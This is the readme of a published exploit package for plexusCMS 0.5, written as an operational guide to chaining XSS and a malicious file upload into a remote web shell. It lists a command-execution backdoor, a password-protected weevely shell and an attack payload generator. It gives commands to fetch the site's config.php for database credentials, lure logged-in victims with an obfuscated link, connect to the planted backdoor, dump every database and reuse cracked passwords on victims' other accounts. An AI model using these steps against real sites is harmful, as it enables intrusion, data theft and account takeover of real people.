# Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
# Google Dork: allinurl: plx-storage
# Date: 22.02.2013
# Exploit Author: neglomaniac
# Vendor Homepage: http://plexus-cms.org/
# Version: 0.5
backdoor.php simple commend execute backdoor
commands.txt list of useful commands for owning remote box
generator.py create important files with given parameters
phpinfo.php simple phpinfo call for testing
plexus05.tgz original plexus source code for auditing
postit.py send evil POST Request for file upload
readme.txt nothing else than this file
request.txt evil POST request template for postit.py
weevely.php weevely shell with password:secret
weevely.tgz weevely stealth web backdoor client and generator
Get database credentials with wget http://RHOST/plx-file/config.php
Try to log in with phpmyadmin and dump the database for password
cracking. If you can crack the password you can upload php files
with new image and new file. You can launch your php backdoors
inside http://plexushost/plx-storage/files/ or plx-storage/images/
If you do not have access to the database in some way you can
upload files with XSS and Social Engineering.
Set up a server with php support and python installed on it. Copy
all this files to a location where you can write to it. Launch
python generator.py plexushost 80 http://yourserver/scripts/ weevely.php
If you see: plximage.php, plximage.js, plximage.xss generated!!!
all files are generated for exploitation.
plexushost is the victim webserver where plexus is installed
port is the standard webserver port
http://yourserver/scripts/ is the location of exploit files. Do not forget
the slash at the end!!!
weevely.php ist the file uploaded at http://victimhost/plx-storage/files/
Get url from plximage.xss obfuscate, iframe and/or shorten it. Put it into
an email, on a webpage or wherever you want.
Socialengineer your victim to open this url. If your victim is logged in
you get your backdoor at: http://victimhost/plx-storage/files/ Else you
need to socialengineer your victim to log in. After the victim logs in you
get your backdoor at files directory.
Connect to your backdoor with weevely and password your password (secret)
python weevely.py http://victimhost/plx-storage/files/yourfile.php secret
Dumpt the whole database with previous collected credential and download ist
mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
Crack password and use it for your next hacking attempts against your victim.
For example try this password for root or other users, other mysql databases,
mysql root, facebook/twitter accounts and so on.
Exploit-DB mirror: http://www.exploit-db.com/sploits/32618.tgz